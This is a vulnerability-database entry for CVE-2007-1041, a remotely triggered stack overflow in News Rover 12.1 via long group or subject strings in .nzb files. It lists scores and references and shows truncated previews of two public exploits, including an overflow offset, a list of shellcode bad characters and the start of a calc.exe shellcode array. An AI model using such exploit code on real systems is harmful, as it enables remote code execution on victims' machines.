CVE-2007-1041
Published 2007-02-21
Priority P347 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.90% (93.3th percentile)
Multiple stack-based buffer overflows in S&H Computer Systems News Rover 12.1 Rev 1 allow remote attackers to execute arbitrary code via a .nzb file with a long (1) group or (2) subject string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sandh | news_rover | — | — |
No detection rules found.
Exploit-DB
News Rover 12.1 Rev 1 - Stack Overflow (2)
exploitdb·2007-02-24
---
#!/usr/bin/perl
# ===============================================================================================
# News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit
# By Umesh Wanve ([email protected])
# ==============================================================================================
# Credits : Originally discovered and coded in c by Marsu
#
# Reference : https://www.securityfocus.com/bid/22618
#
# Date : 24-02-2007
#
# This is converted into perl for perl lovers.
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing more than 2022 bytes we can able to
Exploit-DB
News Rover 12.1 Rev 1 - Stack Overflow (1)
exploitdb·2007-02-20
---
/*********************************************************************************************\
* *
* News Rover 12.1 Rev 1 Remote Stack Overflow exploit *
* Coded and discovered by Marsu *
* *
* Note: thanks to the Bananas and to KryptonIT. Good luck to the inuITs :P *
\*********************************************************************************************/
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
/* win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* BAD CHARS ARE 0x00 0x3c 0x3d 0x3e 0x3f 0x0a 0x0d 0x22 0x25 0x26 0xA7 0x8a. Maybe more... */
char calcshellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\xb2\x82\x70\x83\xeb\xfc\xe2\xf4\x58\x5a\xc6
No writeups or analysis indexed.
http://osvdb.org/33253
http://secunia.com/advisories/24216
http://www.securityfocus.com/bid/22618
http://www.vupen.com/english/advisories/2007/0663
https://exchange.xforce.ibmcloud.com/vulnerabilities/32576
https://www.exploit-db.com/exploits/3342